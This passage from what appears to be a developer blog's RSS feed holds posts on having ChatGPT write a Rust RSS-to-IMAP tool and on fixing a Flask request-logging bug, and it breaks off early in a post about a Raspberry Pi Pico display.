<p>For example, we could click on a &quot;Save for later&quot; button on a page, and an unread email with the page's content appears in our mailbox. Or we subscribe to the RSS feed of a site and new articles arrive as emails. So it could be used as kind of a database, for which there are already a bunch of clients on every platform imaginable.</p>
<h3>A little bit of extra intelligence</h3>
<p>Time went by, but the project was still going nowhere until one day I was talking to ChatGPT (model GPT-4, but I just called him Dave) about what fun weekend projects he could come up with. The responses weren't so inspiring, but it occurred to me that I already have a weekend project I should dust off.</p>
<p>So I asked him how to process RSS feeds in Python. Then how to create email messages and save them via IMAP protocol. The answers were quite convincing at first glance, so I had him write the whole project: create an email message from all the entries of an RSS feed, then save it to a mailbox via IMAP, all written in Python of course.</p>
<p>At this point, I had a minor existential crisis. No need to keep me around, just ask ChatGPT. I'm sure it would take him much less time to write this article and here I am, doing this for hours.</p>
<p>But gloom aside, I finally decided to tell him to rewrite the whole thing in Rust and I'll try to run it. It's a trendy thing anyway and I don't really know Rust, so it'll be more exciting.</p>
<h3>Ready to start</h3>
<p>First, I got a list of the dependencies I need to add to my <code>Cargo.toml</code> file:</p>
<pre><code class="hljs ini"><span class="hljs-section">[dependencies]</span>
<span class="hljs-attr">rss</span> = <span class="hljs-string">"1.10.0"</span>
<span class="hljs-attr">lettre</span> = <span class="hljs-string">"0.10.0-rc.3"</span>
<span class="hljs-attr">imap</span> = <span class="hljs-string">"3.0.0"</span>
<span class="hljs-attr">native-tls</span> = <span class="hljs-string">"0.2.8"</span>
<span class="hljs-attr">tokio</span> = { version = <span class="hljs-string">"1.0"</span>, features = [<span class="hljs-string">"full"</span>] }
</code></pre>
<p>Looks good, but <code>imap</code> doesn't have <code>3.0.0</code> (yet), so I changed it to <code>3.0.0-alpha.10</code> because that was the most up-to-date version. If it were up to me, I'd rather use the latest stable version of everything, but I'm not paid to think (heck, I'm not even paid).</p>
<p>The first code snippet I got was the downloading and processing of the RSS feed:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> rss::Channel;

<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">parse_rss_feed</span></span>(url: &amp;<span class="hljs-built_in">str</span>) -&gt; <span class="hljs-built_in">Result</span>&lt;Channel, <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> content = reqwest::get(url).<span class="hljs-keyword">await</span>?.bytes().<span class="hljs-keyword">await</span>?;
    <span class="hljs-keyword">let</span> channel = Channel::read_from(&amp;content[..])?;
    <span class="hljs-literal">Ok</span>(channel)
}
</code></pre>
<p>The compiler complained that it didn't know anything about the <code>reqwest</code> module, so I had to add a <code>reqwest = &quot;0.11.16&quot;</code> row to the <code>Cargo.toml</code> file.</p>
<p>The next piece of code I got was the creation of the email message from the RSS feed:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> lettre::message::{Header, Message, Mailbox};

<span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">create_email_from_entry</span></span>(entry: &amp;rss::Item, sender: &amp;<span class="hljs-built_in">str</span>, recipient: &amp;<span class="hljs-built_in">str</span>) -&gt; Message {
    <span class="hljs-keyword">let</span> body = <span class="hljs-built_in">format!</span>(<span class="hljs-string">"{}\n\nRead more at: {}"</span>, entry.description().unwrap_or_default(), entry.link().unwrap_or_default());
    Message::builder()
        .from(sender.parse().unwrap())
        .to(recipient.parse().unwrap())
        .subject(entry.title().unwrap_or_default())
        .header(Header::new(<span class="hljs-string">"Content-Type"</span>, <span class="hljs-string">"text/plain; charset=utf-8"</span>))
        .body(body)
        .unwrap()
}
</code></pre>
<p>The compiler did not like the use of <code>Header</code> because it's private. And the <code>Mailbox</code> isn't even used. Fortunately, there is built-in support for the <code>text/plain</code> content type in the library, so this is what I came up with:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> lettre::message::{header::ContentType, Message};

<span class="hljs-ignore">fn create_email_from_entry(entry: &amp;rss::Item, sender: &amp;str, recipient: &amp;str) -&gt; Message {</span>
<span class="hljs-ignore">    let body = format!("{}\n\nRead more at: {}", entry.description().unwrap_or_default(), entry.link().unwrap_or_default());</span>
<span class="hljs-ignore">    Message::builder()</span>
<span class="hljs-ignore">        .from(sender.parse().unwrap())</span>
<span class="hljs-ignore">        .to(recipient.parse().unwrap())</span>
<span class="hljs-ignore">        .subject(entry.title().unwrap_or_default())</span>
        .header(ContentType::TEXT_PLAIN)
<span class="hljs-ignore">        .body(body)</span>
<span class="hljs-ignore">        .unwrap()</span>
}
</code></pre>
<p>The next thing was saving the email message via IMAP protocol:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> imap::Client;
<span class="hljs-keyword">use</span> native_tls::TlsConnector;

<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">save_emails_to_mailbox</span></span>(
    imap_server: &amp;<span class="hljs-built_in">str</span>,
    user_email: &amp;<span class="hljs-built_in">str</span>,
    password: &amp;<span class="hljs-built_in">str</span>,
    mailbox: &amp;<span class="hljs-built_in">str</span>,
    messages: <span class="hljs-built_in">Vec</span>&lt;Message&gt;,
) -&gt; <span class="hljs-built_in">Result</span>&lt;(), <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> tls = TlsConnector::builder().build()?;
    <span class="hljs-keyword">let</span> client = Client::secure_connect((imap_server, <span class="hljs-number">993</span>), imap_server, &amp;tls)?;
    <span class="hljs-keyword">let</span> <span class="hljs-keyword">mut</span> imap_session = client.login(user_email, password).map_err(|(e, _)| e)?;

    imap_session.select(mailbox)?;

    <span class="hljs-keyword">for</span> message <span class="hljs-keyword">in</span> messages {
        <span class="hljs-keyword">let</span> message_string = message.formatted();
        imap_session.append(mailbox, message_string.as_bytes())?;
    }

    imap_session.logout()?;
    <span class="hljs-literal">Ok</span>(())
}
</code></pre>
<p>That's a bit problematic. The <code>Client::secure_connect</code> doesn't exist, <code>message_string</code> doesn't have an <code>as_bytes</code> method and for some reason, you can't put <code>?</code> after <code>append(...)</code>. If I'd know Rust, I could probably explain to you why, but knowing my situation, let's just say that I managed to compile it eventually:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> imap::ClientBuilder;

<span class="hljs-ignore">async fn save_emails_to_mailbox(</span>
<span class="hljs-ignore">    imap_server: &amp;str,</span>
<span class="hljs-ignore">    user_email: &amp;str,</span>
<span class="hljs-ignore">    password: &amp;str,</span>
<span class="hljs-ignore">    mailbox: &amp;str,</span>
<span class="hljs-ignore">    messages: Vec&lt;Message&gt;,</span>
<span class="hljs-ignore">) -&gt; Result&lt;(), Box&lt;dyn std::error::Error&gt;&gt; {</span>
    <span class="hljs-keyword">let</span> client = ClientBuilder::new(imap_server, <span class="hljs-number">993</span>).native_tls()?;
<span class="hljs-ignore">    let mut imap_session = client.login(user_email, password).map_err(|(e, _)| e)?;</span>

<span class="hljs-ignore">    imap_session.select(mailbox)?;</span>

<span class="hljs-ignore">    for message in messages {</span>
<span class="hljs-ignore">        let message_string = message.formatted();</span>
        imap_session.append(mailbox, message_string.as_slice());
<span class="hljs-ignore">    }</span>

<span class="hljs-ignore">    imap_session.logout()?;</span>
<span class="hljs-ignore">    Ok(())</span>
<span class="hljs-ignore">}</span>
</code></pre>
<p>And last but not least is the <code>main()</code> function, which wraps it all up:</p>
<pre><code class="hljs rust"><span class="hljs-meta">#[tokio::main]</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">main</span></span>() -&gt; <span class="hljs-built_in">Result</span>&lt;(), <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> rss_url = <span class="hljs-string">"https://example.com/rss_feed.xml"</span>;
    <span class="hljs-keyword">let</span> imap_server = <span class="hljs-string">"imap.gmail.com"</span>;
    <span class="hljs-keyword">let</span> user_email = <span class="hljs-string">"your_email@example.com"</span>;
    <span class="hljs-keyword">let</span> password = <span class="hljs-string">"your_password"</span>;
    <span class="hljs-keyword">let</span> mailbox = <span class="hljs-string">"INBOX"</span>;

    <span class="hljs-keyword">let</span> channel = parse_rss_feed(rss_url).<span class="hljs-keyword">await</span>?;

    <span class="hljs-keyword">let</span> messages: <span class="hljs-built_in">Vec</span>&lt;_&gt; = channel
        .items()
        .iter()
        .map(|entry| create_email_from_entry(entry, user_email, user_email))
        .collect();

    save_emails_to_mailbox(imap_server, user_email, password, mailbox, messages).<span class="hljs-keyword">await</span>?;

    <span class="hljs-literal">Ok</span>(())
}
</code></pre>
<p>The compiler didn't find any errors in this, but a new warning from the previous code came up that we should use <code>AppendCmd</code> returned by the <code>append(...)</code> call. From this I had a suspicion that something was not quite right and fixed it like this:</p>
<pre><code class="hljs rust">imap_session.append(mailbox, message_string.as_slice()).finish()?;
</code></pre>
<p>What a joy, the <code>?</code> at the end of the line is back and the code is compiled without any problems. At last, I replaced the values of the config variables in <code>main()</code> with the correct ones, ran the resulting program, and... it worked!</p>
<h3>A brave new world</h3>
<p>I would be more than happy to say that it was a shame to leave a human's work to a machine, but on one hand, it still saved a lot of time for me, and on the other hand, ChatGPT would probably have fixed it himself if I had copied back the error messages to him.</p>
<p>Afterward, we talked a bit more about how he would run the program using systemd, Supervisor, or Docker, how to monitor such a program, and what config file format he would recommend, but if you want to know more about that, you'll have to ask him, he'll be happy to tell you.</p>

]]></content:encoded>
        </item>
            <item>
            <title>A bug&#039;s life</title>
            <link>https://deadlime.hu/en/2023/02/03/a-bugs-life/</link>
            <pubDate>Fri, 03 Feb 2023 10:06:12 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[Flask]]></category>
                    <category><![CDATA[logging]]></category>
                    
            <guid isPermaLink="false">05ce611190baa7c7a69c6bceec4f3b0e</guid>
            <description>How to log the wrong way in Flask</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/flasks.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Our past decisions can stab us in the back in quite surprising and unexpected ways. This is no different during the natural evolution of our code. Only time can tell whether the choices we make today will turn out to be right or wrong in the future.<br />
Of course, there are &quot;habits&quot;, &quot;methodologies&quot;, &quot;patterns&quot; and other things that can be followed, which will produce good results in most cases, but sometimes we still manage to be creative enough to shoot ourselves in the foot.</p>
<p>Today we'll try to achieve that using Python and <a href="https://flask.palletsprojects.com/">Flask</a> by extending a very complex &quot;Hello World&quot; application.</p>
<h3>A bug's birth</h3>
<p>So the project starts, everyone is excited, we finally have a blank page to fill in, and the development will not be slowed down by the weight of our previous (wrong) decisions. Soon we finish the first version.</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HelloView</span><span class="hljs-params">(MethodView)</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">return</span> <span class="hljs-string">'Hello World\n'</span>

app = Flask(__name__)
app.add_url_rule(<span class="hljs-string">'/'</span>, view_func=HelloView.as_view(<span class="hljs-string">'hello'</span>))

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    app.run()
</code></pre>
<p>Soon after, we realise that such a complex application cannot exist without logging, so we add it as an afterthought.</p>
<pre><code class="hljs python"><span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = logging.getLogger(<span class="hljs-string">'view.hello'</span>)

<span class="hljs-ignore">    def get(self):</span>
        self.logger.info(<span class="hljs-string">'hello from view'</span>)
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>So far so good, calling the app works as expected:</p>
<pre class="console"><code>$ curl localhost:8080
Hello World
</code></pre>
<p>And our message also appears in the logs:</p>
<pre><code class="hljs json">{<span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>, <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view"</span>}
</code></pre>
<p>But as time goes on and requirements change, we need to be able to add extra data to the logs. Such data could be, say, a unique identifier generated for the requests.</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ContextLogger</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger
        self.__context = {}

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_context</span><span class="hljs-params">(self, key, value)</span>:</span>
        self.__context[key] = value

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=self.__context)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_request_id</span><span class="hljs-params">(logger)</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decorator</span><span class="hljs-params">(f)</span>:</span>
<span class="hljs-meta">        @wraps(f)</span>
        <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decorated_function</span><span class="hljs-params">(self)</span>:</span>
            request_id = uuid.uuid4()
            logger.add_context(<span class="hljs-string">'request_id'</span>, request_id)
            logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
            <span class="hljs-keyword">return</span> f(self, request_id)
        <span class="hljs-keyword">return</span> decorated_function
    <span class="hljs-keyword">return</span> decorator

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = ContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-meta">    @add_request_id(logger)</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self, request_id)</span>:</span>
        time.sleep(<span class="hljs-number">0.01</span>)
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>In reality, <code>ContextLogger</code> would be a bit more complex, implementing the other logging functions (<code>warn</code>, <code>error</code>, etc.) and handling the external <code>extra</code> parameters.</p>
<p>The <code>sleep</code> call is intended to simulate other work done by the view class. Like it should also call some backend service to collect the data needed to display <code>Hello World</code> or something like that. Anyway, the application still works fine.</p>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (5f428aa7-cf68-4ae4-a003-2b95085f7f7d)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"5f428aa7-cf68-4ae4-a003-2b95085f7f7d"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (5f428aa7-cf68-4ae4-a003-2b95085f7f7d)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"5f428aa7-cf68-4ae4-a003-2b95085f7f7d"</span>
}
</code></pre>
<p>Or does it? What happens if we try to send multiple requests at the same time?</p>
<pre class="console"><code>$ curl localhost:8080 &amp; curl localhost:8080 &amp;
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (36d1627c-2159-4865-92ed-c63969efde47)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"36d1627c-2159-4865-92ed-c63969efde47"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (78062d9e-bb3a-4a74-a24c-e0ba22be6660)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (36d1627c-2159-4865-92ed-c63969efde47)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (78062d9e-bb3a-4a74-a24c-e0ba22be6660)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
</code></pre>
<p>The middleware logs look fine, but the view logs have the same <code>request_id</code> for both requests. Yet the <code>message</code> has the right value. What the f... udge.</p>
<h3>The quick fix</h3>
<p>The error is caused by the fact that our <code>logger</code> variable in the <code>HelloView</code> class is static, so it is only initialized once when the application is started and our module containing the class is loaded. We expected to have a different logger class per request. Or rather, we didn't even think about it. Logging worked before, it worked after, so there should be no problem here.</p>
<p>A possible fix might be to initialize the <code>logger</code> in the constructor, but then we can't simply pass it to the middleware (which might be necessary so the view and the middleware running before it create logs with the same name).</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_request_id</span><span class="hljs-params">()</span>:</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            self.logger.add_context(<span class="hljs-string">'request_id'</span>, request_id)
            self.logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = <span class="hljs-literal">None</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.logger = ContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-meta">    @add_request_id()</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>The decorator can access all the parameters of the function it decorates, including <code>self</code>, which can still be used to access the <code>logger</code>. Not very elegant, but it works. That's what quick fixes are all about, right?</p>
<h3>A more permanent solution</h3>
<p>In Flask there is a thing called <a href="https://flask.palletsprojects.com/en/2.2.x/reqcontext/">Request Context</a>, the <code>request</code> variable will always refer to the request currently being processed, so if we could add our own data to it, that would solve the problem. By overriding some Flask classes we can solve this.</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyRequest</span><span class="hljs-params">(Request)</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, environ, populate_request=True, shallow=False)</span>:</span>
        super().__init__(environ, populate_request, shallow)
        self.__context = {}

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">context</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">return</span> self.__context

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_context</span><span class="hljs-params">(self, key, value)</span>:</span>
        self.__context[key] = value

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyFlask</span><span class="hljs-params">(Flask)</span>:</span>
    request_class = MyRequest

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">RequestContextLogger</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=request.context)

<span class="hljs-ignore">def add_request_id(logger):</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            request.add_context(<span class="hljs-string">'request_id'</span>, request_id)

<span class="hljs-ignore">            logger.info(f'hello from middleware ({request_id})')</span>
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = RequestContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-ignore">    @add_request_id(logger)</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>

app = MyFlask(__name__)
<span class="hljs-ignore">app.add_url_rule('/', view_func=HelloView.as_view('hello'))</span>

<span class="hljs-ignore">if __name__ == '__main__':</span>
<span class="hljs-ignore">    app.run()</span>
</code></pre>
<p>During my attempts to create this solution, I managed to shoot myself in the foot once again, just as I did with the <code>logger</code>. In the first version, the <code>__context</code> was not set in <code>__init__</code>, so every request used the same <code>dict</code>, which made it seem like it would not work. I didn't learn from my mistakes fast enough.</p>
<p>After a bit of digging, you may find that we're not the only ones who thought that adding extra data to <code>request</code> might be a desirable thing to do. We can replace our homebrew solution with Flask's <a href="https://flask.palletsprojects.com/en/2.2.x/appcontext/#storing-data"><code>g</code> variable</a>, which will help to get rid of a good chunk of code.</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GContextLogger</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=g.log_context)

<span class="hljs-ignore">def add_request_id(logger):</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            g.log_context = {<span class="hljs-string">'request_id'</span>: request_id}

<span class="hljs-ignore">            logger.info(f'hello from middleware ({request_id})')</span>
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = GContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-ignore">    @add_request_id(logger)</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>A bit better, but still, we could improve this. What happens, for example, if the view throws an exception and it is handled by a Flask error handler, which also happens to create a log? Will the extra data be on it? And on the logs of an external module we use?</p>
<h3>The &quot;final&quot; solution</h3>
<p>As far as anything can be final. Perhaps &quot;a solution that meets the current requirements to the best of our knowledge&quot; would be a better term. First of all, let's get rid of the <code>GContextLogger</code> class so that we don't have to wrap all our log instances in something. To do this, we can use <a href="https://docs.python.org/3/howto/logging-cookbook.html#using-filters-to-impart-contextual-information">Python's log filter</a>, which is designed for filtering logs but is also often used for this purpose.</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">LogContextFilter</span><span class="hljs-params">(Filter)</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">filter</span><span class="hljs-params">(self, record)</span>:</span>
        <span class="hljs-keyword">if</span> has_request_context() <span class="hljs-keyword">and</span> hasattr(g, <span class="hljs-string">'log_context'</span>):
            <span class="hljs-keyword">for</span> k, v <span class="hljs-keyword">in</span> g.log_context.items():
                setattr(record, k, v)

        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
<p>Here we are a bit more careful about accessing <code>g.log_context</code>. We should only try to get data from it if we are processing a Flask request and it already has a <code>log_context</code>.</p>
<p>You can also get rid of the <code>logger</code> creation and use the <a href="https://flask.palletsprojects.com/en/2.2.x/logging/">Flask-configured <code>app.logger</code></a> instead. The only drawback is that you have to manually add the view name to the logs (if you really need it) because the <code>name</code> field will have the same value as the <code>app.name</code> variable.</p>
<pre><code class="hljs python"><span class="hljs-ignore">def add_request_id():</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            g.log_context = {
                <span class="hljs-string">'request_id'</span>: request_id,
                <span class="hljs-string">'view'</span>: self.__class__.__name__,
            }

            app.logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
<span class="hljs-ignore">    @add_request_id()</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
        app.logger.info(<span class="hljs-string">f'hello from view (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"test"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (7575ef53-8764-4d17-967b-af2902691ac4)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"7575ef53-8764-4d17-967b-af2902691ac4"</span>,
  <span class="hljs-attr">"view"</span>: <span class="hljs-string">"HelloView"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"test"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (7575ef53-8764-4d17-967b-af2902691ac4)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"7575ef53-8764-4d17-967b-af2902691ac4"</span>,
  <span class="hljs-attr">"view"</span>: <span class="hljs-string">"HelloView"</span>
}
</code></pre>
<p>Since we probably want to do this for every request, we can also replace the <code>add_request_id</code> middleware with a global solution.</p>
<pre><code class="hljs python"><span class="hljs-ignore">class HelloView(MethodView):</span>
<span class="hljs-ignore">    def get(self):</span>
        g.log_context[<span class="hljs-string">'view'</span>] = self.__class__.__name__

<span class="hljs-ignore">        app.logger.info(f'hello from view')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>

<span class="hljs-ignore">app = Flask(__name__)</span>
<span class="hljs-ignore">app.add_url_rule('/', view_func=HelloView.as_view('hello'))</span>

<span class="hljs-meta">@app.before_request</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">init_logging_context</span><span class="hljs-params">()</span>:</span>
    g.log_context = {
        <span class="hljs-string">'request_id'</span>: uuid.uuid4(),
        <span class="hljs-string">'ip'</span>: request.remote_addr,
    }
</code></pre>
<p>One drawback of this solution is that we don't know which view will be called in <code>before_request</code>, so we can't put its name in the <code>log_context</code>.</p>
<p>This brings us to our current final solution. You can see the individual phases in their entirety at the <a href="https://github.com/deadlime/flask-logging-experiments">related GitHub repository</a>. Have a nice log.</p>

]]></content:encoded>
        </item>
            <item>
            <title>The smallest Pi</title>
            <link>https://deadlime.hu/en/2022/10/21/the-smallest-pi/</link>
            <pubDate>Fri, 21 Oct 2022 12:59:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">bdb82983ddddf670b3eccc41ef751b23</guid>
            <description>Using a 7-segment display with Raspberry Pi Pico</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/pico.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Almost two years passed since the release of the Raspberry Pi Pico. The newer Wi-Fi capable model W has also been released since then. Naturally, I ordered both of them but it took a long time to get to the point to actually use them to do something. But the day finally came.</p>
<p>I'll drive a 4 character 7-segment display with it using the Pico's PIO (programmable IO). These things are small state machines inside the Pico and you can run assembly code on them.</p>
<h3>Preparations</h3>
<p>The <a href="https://www.raspberrypi.com/documentation/microcontrollers/raspberry-pi-pico.html#raspberry-pi-pico">official documentation</a> is quite comprehensive about setting up a development environment so I won't go into details here.</p>
<p>The default process is not that developer friendly: you build the program, unplug the USB cable from the Pico, hold down the button on the Pico, plug back the USB cable, drag and drop your U2F file into the storage and we are done. What can I say, it kills the mood a bit. Luckily there are alternative solutions.</p>
<p>In the end I went with the Picoprobe + CLion direction, this way I could debug the new code on the Pico with a press of a button in the IDE. First I started to set this up on Windows, but I gave up on the &quot;build OpenOCD with MSYS2&quot; part and switched to Linux. Maybe I'll give it another try with WSL2 if I need some challenge. Beside the official documentation <a href="https://twitter.com/savage_drummer/status/1376495816353796099">this tweet</a> helped a lot setting up everything.</p>
<h3>The display</h3>

<p class="image image-center">
